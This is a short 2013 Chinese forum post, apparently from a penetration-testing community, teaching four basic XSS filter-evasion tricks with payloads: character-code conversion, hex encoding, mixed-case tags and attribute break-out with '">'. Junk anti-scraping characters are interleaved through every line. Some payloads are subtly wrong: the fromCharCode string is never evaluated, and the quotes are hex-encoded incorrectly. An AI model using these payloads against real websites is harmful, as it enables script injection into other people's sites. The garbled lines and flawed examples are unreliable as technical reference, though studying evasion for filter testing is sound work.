中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]
作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。+ ~9 j5 Z8 }! Y8 S9 E8 V
1.转换为ASCII码  f, J8 K! C  y
例子:原脚本为<script>alert(‘I love F4ck’)</script >( t  j+ }6 n8 @! z+ j
通过转换,变成:) R3 E; D% i- H% L9 x; g
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>1 y$ L2 y# h  R! o

9 y) k6 v; c) a) d3 Z) X2.转换为HEX(十六进制)
# b, w- l0 s0 \  f9 J6 g1 G例子:原脚本为<script>alert(‘I love F4ck’)</script>
, J! V: n! m! T通过转换,变成:; @5 B/ O# V5 \
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
0 S: w* K; H0 @3 }! ?$ X4 d
9 l/ ]/ a: D/ J# O0 K  \! Y! t) F3.转换脚本的大小写
1 i0 k( K/ g* L5 n例子:原脚本为<script>alert(‘I love F4ck’)</script>" g) v' t' B! ]! i: v
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>) ~$ ]  Y6 @4 P3 q2 c0 r

) Q& z& [4 M2 t! }7 \2 D; L( z4.增加闭合标记”>
- v1 ?# q0 y* \, e- Y3 C' q例子:原脚本为<script>alert(‘I love F4ck’)</script>
  G/ B! C7 K( X' o# T转换为:”><script>alert(‘I love F4ck’)</script>
3 c* Q8 _0 v: g: K9 K& C更详细绕过技术请参考此网页
. _% m# s) H8 ]& `# ?https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
5 Z  q4 {+ y1 Y, B1 Q+ O5 w
5 b0 e0 b8 H3 w: e' z1 S* _转换工具使用的是火狐的 hackbar mozilla addon.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2